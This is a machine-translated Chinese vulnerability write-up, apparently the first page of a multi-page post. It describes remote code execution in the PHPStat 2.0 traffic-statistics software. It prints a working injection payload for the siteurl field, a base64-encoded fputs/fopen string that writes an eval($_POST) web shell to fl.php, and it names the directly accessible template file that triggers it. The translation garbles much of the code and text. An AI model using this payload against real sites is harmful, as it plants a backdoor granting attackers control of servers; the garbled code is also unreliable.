PHPStat 2.0 remote code execution vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201027709
Type myhack58
Reporter 佚名
Modified 2010-07-28T00:00:00


phpStat is a professional web site traffic statistics software system that provides website Log analysis, web data analysis, user behavior analysis system,to provide customers with in-depth excavation of the site of flow cross-Data Report. In visitor behavior analysis,web marketing analysis, and site decision-making support has a unique analysis system,for the customer to find the data behind the real valuable things,come up with enforceable recommendations. The system developers puai hotel positioning itself as China's most professional website, data Analytics technology provider, write out the code functions really good, but security is very poor, vulnerability is everywhere visible. Use PHPStat statistics website can essentially be hacking spike.

The system most of the code is zend encrypted, 解密后我们来看user_info.php ordinary user to modify the statistics of the website code, The New time is substantially similar to

...... $fileStr .= "<?\ nif( ! defined('WEB_HOME') ) exit('Access Denied');\n"; $fileStr .= "if( file_exists( \"../count/exclusion/website_\".\$ websiteid.\" regexp.php\") )\n"; $fileStr .= "the include_once \"../count/exclusion/website\".\$ websiteid.\" regexp.php\";\n"; $fileStr .= "\n//statistics website address\n"; $fileStr .= "\$siteurl = \"".$ _POST['site']."\";\ n"; $fileStr .= "\n//process the exclude IP address list\n";...... $fileStr .= "\$mainsitecode = \"".$ Tmp[sitegroup]."\";\ n"; $fileStr .= "?& gt;"; if ( ! file_exists( COUNT_DIRNAME."/ exclusion/website".$ Tmp[website].". php" ) ) { write_to_file( COUNT_DIRNAME."/ exclusion/website_".$ Tmp[website].". php", "", "w+" ); } ...... From the above code can be seen, assuming the ordinary user to add the site number 1 0 0 0 0 3, then the configuration file is \count\exclusion\website_100003.php the content format is as follows:

<? if( ! defined('WEB_HOME') ) exit('Access Denied'); if( file_exists( "../count/exclusion/website_".$ websiteid." regexp.php") ) the include_once "../count/exclusion/website".$ websiteid." _regexp.php"; //statistics web site address $siteurl = " "; //programs the excluded IP address list //program directory that contains the address of the list //the program belongs to the primary site code $mainsitecode = "5 0"; ?& gt; From the above code can be seen, we submitted the siteurl will be written into the php files and double quotation marks. Familiar with php friends should understand, right? Use double quotation marks characteristics, we can construct a special siteurl to write to a file and executed successfully, I configured the siteurl as follows:

http://${${fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgpz4x))}} Above this piece of code is <? php @eval($_POST[a]); ?& gt;1 to fl. php file. Use base64_encode coding to avoid the use of single quotes, so no need to consider the gpc's influence. Note that the string does not include the + \ =and other special symbols of the case, base64_decode parameter is without the use of single quotation marks or double quotation marks.

Now there still remains one problem, the beginning of the file code if( ! defined('WEB_HOME') ) exit('Access Denied'); limit our direct trigger of this small section of the shellcode, we have to find a define the WEB_HOME the file to include. PHPStat for us to provide a plurality of such file and we continue to look at\templates\ms\common\top. php file part of the code, The file can be accessed directly.

<? session_start(); the include_once '../../../'; the include_once '../../../'; the include_once '../../../'; the include_once '../../../'; the include_once '../../../'; the include_once '../../../'; the include_once '../../../parse_site.php'; $website = via strtolower(strval($GET[website])); $action = via strtolower(strval($_GET[action])); $websiteid = $website; $queryLimit = new queryLimit(); if( strval($_GET[showtype] ) == 'all' ) $website = $website."& amp;showtype=all"; the include_once "../../../". COUNT_DIRNAME."/ exclusion/website".$ websiteid.". php"; //here you can trigger our code

[1] [2] next